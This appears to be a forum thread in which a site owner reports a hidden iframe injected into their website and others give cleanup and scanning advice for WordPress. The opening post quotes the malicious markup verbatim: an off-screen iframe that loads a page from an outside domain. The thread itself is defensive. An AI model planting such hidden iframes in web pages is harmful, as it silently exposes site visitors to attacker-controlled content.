Greetings,

After working on my website for a long time, I noticed the presence of the following links:

<iframe src="http://ppstpfh.mrslsove.com/3c7.2ltJm2evPCAk?default" name="Lendomen" height="103" width="103" style="left:-500px;top:0px;position:fixed;"></iframe>
Although I cannot locate these links in the source code, they are visible through developer tools. I am unsure how to remove them and would appreciate any assistance from those who have faced a similar problem.

Do these appear in all JavaScript files? If so, they need to be removed separately, making sure to delete everything because otherwise they will be restored. I was able to delete it by using a "text replacer" program in a backup of the site and uploading it again. You could try this method.

Remove all modules, plugins, components, etc. that were installed prior to the virus's appearance, as it can be loaded from there. Then proceed to delete the code again. By the way, I had to delete it in parts as it kept changing constantly.

It is recommended to ask the hosting provider to check your website, as they have powerful means of protection against security issues.

Using free templates is not safe, and it is recommended to treat them with caution. It is better to create a template using a program like Artisteer to ensure it contains no malicious code.

The WP Theme Authenticity Checker (TAC) plugin can be used to check templates for third-party links. If the green square and "Theme OK" appear, there is nothing to worry about. However, if the template contains a link to the developer's website, it can be removed from the theme code.

The AntiVirus for WordPress plugin can also be used to scan templates for third-party code. It is possible to enable daily scanning and receive alerts via email.

The Exploit Scanner Plugin is a powerful tool but should be used by advanced users as it is highly suspicious and may flag legitimate code as malicious. When encountering a problem, comparing the code with a clean WP installation may help identify malicious code.